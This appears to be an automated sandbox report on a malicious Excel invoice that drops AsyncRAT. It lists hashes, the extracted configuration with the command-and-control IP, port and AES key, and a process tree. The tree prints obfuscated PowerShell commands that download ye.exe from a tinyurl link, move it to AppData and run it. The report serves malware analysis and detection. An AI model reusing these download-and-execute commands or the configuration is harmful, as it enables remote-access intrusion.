Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 10:19
Static task
static1
Behavioral task
behavioral1
Sample
PROFORMA INVOICE INV-1.xls
Resource
win7
General
-
Target
PROFORMA INVOICE INV-1.xls
-
Size
66KB
-
MD5
53a8387449c7201a5d07f1a065d9e789
-
SHA1
7fb04159123617c551cbe189cccd6d0c9fe179ae
-
SHA256
b353116f931196bc449483113b61ac01a50bd35b24569cb79919cec26dc6d535
-
SHA512
fc54e553c2299eaf386bbad998b2d3a11f7cd613e2807958f5e2c5631b3e8a05531f2c3bf21d02efbbe21bb23e4703e27d49c1d018e8ca919c16df6b1f9ee8ee
Malware Config
Extracted
https://tinyurl.com/yxbf64lf
Extracted
asyncrat
0.5.7B
185.165.153.249:4371
AsyncMutex_6SI8OkPnk
-
aes_key
4lpLfCzV6wCkayaT0MjD3qp2ZVBd759O
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
185.165.153.249
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
4371
-
version
0.5.7B
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4332 4756 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4348 4756 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4356 4756 cmd.exe EXCEL.EXE -
ServiceHost packer 5 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/196-35-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/196-37-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/196-36-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/196-38-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/196-39-0x0000000000000000-mapping.dmp servicehost -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 16 3964 powershell.exe 18 3964 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
ye.exeye.exepid process 196 ye.exe 3224 ye.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
ye.exepid process 196 ye.exe 196 ye.exe 196 ye.exe 196 ye.exe 196 ye.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ye.exedescription pid process target process PID 196 set thread context of 3224 196 ye.exe ye.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1120 196 WerFault.exe ye.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4756 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exepowershell.exepowershell.exeye.exeWerFault.exepid process 3236 powershell.exe 620 powershell.exe 3964 powershell.exe 620 powershell.exe 3236 powershell.exe 620 powershell.exe 3236 powershell.exe 3964 powershell.exe 3964 powershell.exe 196 ye.exe 196 ye.exe 196 ye.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe 1120 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exeye.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 196 ye.exe Token: SeRestorePrivilege 1120 WerFault.exe Token: SeBackupPrivilege 1120 WerFault.exe Token: SeDebugPrivilege 1120 WerFault.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE 4756 EXCEL.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exepowershell.exeye.exedescription pid process target process PID 4756 wrote to memory of 4332 4756 EXCEL.EXE cmd.exe PID 4756 wrote to memory of 4332 4756 EXCEL.EXE cmd.exe PID 4756 wrote to memory of 4348 4756 EXCEL.EXE cmd.exe PID 4756 wrote to memory of 4348 4756 EXCEL.EXE cmd.exe PID 4756 wrote to memory of 4356 4756 EXCEL.EXE cmd.exe PID 4756 wrote to memory of 4356 4756 EXCEL.EXE cmd.exe PID 4348 wrote to memory of 620 4348 cmd.exe powershell.exe PID 4348 wrote to memory of 620 4348 cmd.exe powershell.exe PID 4356 wrote to memory of 3236 4356 cmd.exe powershell.exe PID 4356 wrote to memory of 3236 4356 cmd.exe powershell.exe PID 4332 wrote to memory of 3964 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 3964 4332 cmd.exe powershell.exe PID 3236 wrote to memory of 196 3236 powershell.exe ye.exe PID 3236 wrote to memory of 196 3236 powershell.exe ye.exe PID 3236 wrote to memory of 196 3236 powershell.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe PID 196 wrote to memory of 3224 196 ye.exe ye.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE INV-1.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxbf64lf'),'ye.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxbf64lf'),'ye.exe')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ye.exe"C:\Users\Admin\AppData\Roaming\ye.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ye.exe"C:\Users\Admin\AppData\Roaming\ye.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 8965⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8493230a82a2d4feba6160f79c301470
SHA133e1a17ae1d48172959c4a6458daaeff2bc8463c
SHA256a60b14883523d776ef31d5f88a1c9feb7811504ed28a6a4fc7237fab20c38ee8
SHA5127b481b5912f46e90f733f9d735139482609d36783920529ca1028cce9fd8554aa56bb3064f0b9230c5aa0297b91e9fdee835c53c1337eef8df945b1dddf3ae18
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8d04343a3598c72eaa9fbb53faf13467
SHA1fe730469384b244b76e65fb22e7811bb58c655f5
SHA256197db7b97fd18ccd2e3308240047ff3be499f25f8aff568605bde2328134c128
SHA5127db608f094ddff4f43550afbccc1d7a74b1aed09549e4e198e953f0b74df813ef1d408ce42e41a0b7f1b89942fac56049e8d1d40addafc8935476f5698e2ace1
-
C:\Users\Admin\AppData\Roaming\ye.exeMD5
c7fb5824488e31a95ace8792feb44dfc
SHA117af3089f7d8afbd58ac3ba1e699b10f7b58c50a
SHA2560ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf
SHA5120b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a
-
C:\Users\Admin\AppData\Roaming\ye.exeMD5
c7fb5824488e31a95ace8792feb44dfc
SHA117af3089f7d8afbd58ac3ba1e699b10f7b58c50a
SHA2560ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf
SHA5120b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a
-
C:\Users\Admin\Documents\ye.exeMD5
c7fb5824488e31a95ace8792feb44dfc
SHA117af3089f7d8afbd58ac3ba1e699b10f7b58c50a
SHA2560ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf
SHA5120b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a
-
memory/196-36-0x0000000000000000-mapping.dmp
-
memory/196-39-0x0000000000000000-mapping.dmp
-
memory/196-35-0x0000000000000000-mapping.dmp
-
memory/196-26-0x0000000002C70000-0x0000000002C87000-memory.dmpFilesize
92KB
-
memory/196-37-0x0000000000000000-mapping.dmp
-
memory/196-25-0x0000000005290000-0x0000000005291000-memory.dmpFilesize
4KB
-
memory/196-27-0x0000000005830000-0x0000000005831000-memory.dmpFilesize
4KB
-
memory/196-23-0x0000000000A10000-0x0000000000A11000-memory.dmpFilesize
4KB
-
memory/196-38-0x0000000000000000-mapping.dmp
-
memory/196-19-0x0000000000000000-mapping.dmp
-
memory/196-22-0x0000000073290000-0x000000007397E000-memory.dmpFilesize
6.9MB
-
memory/620-6-0x00007FFE8AB80000-0x00007FFE8B56C000-memory.dmpFilesize
9.9MB
-
memory/620-4-0x0000000000000000-mapping.dmp
-
memory/620-12-0x0000022CECF90000-0x0000022CECF91000-memory.dmpFilesize
4KB
-
memory/1120-40-0x0000000005260000-0x0000000005261000-memory.dmpFilesize
4KB
-
memory/1120-34-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/3224-29-0x000000000040D06E-mapping.dmp
-
memory/3224-28-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/3224-31-0x0000000073290000-0x000000007397E000-memory.dmpFilesize
6.9MB
-
memory/3236-10-0x000001F6CAB70000-0x000001F6CAB71000-memory.dmpFilesize
4KB
-
memory/3236-7-0x00007FFE8AB80000-0x00007FFE8B56C000-memory.dmpFilesize
9.9MB
-
memory/3236-5-0x0000000000000000-mapping.dmp
-
memory/3964-9-0x00007FFE8AB80000-0x00007FFE8B56C000-memory.dmpFilesize
9.9MB
-
memory/3964-8-0x0000000000000000-mapping.dmp
-
memory/4332-1-0x0000000000000000-mapping.dmp
-
memory/4348-2-0x0000000000000000-mapping.dmp
-
memory/4356-3-0x0000000000000000-mapping.dmp
-
memory/4756-0-0x00007FFE92450000-0x00007FFE92A87000-memory.dmpFilesize
6.2MB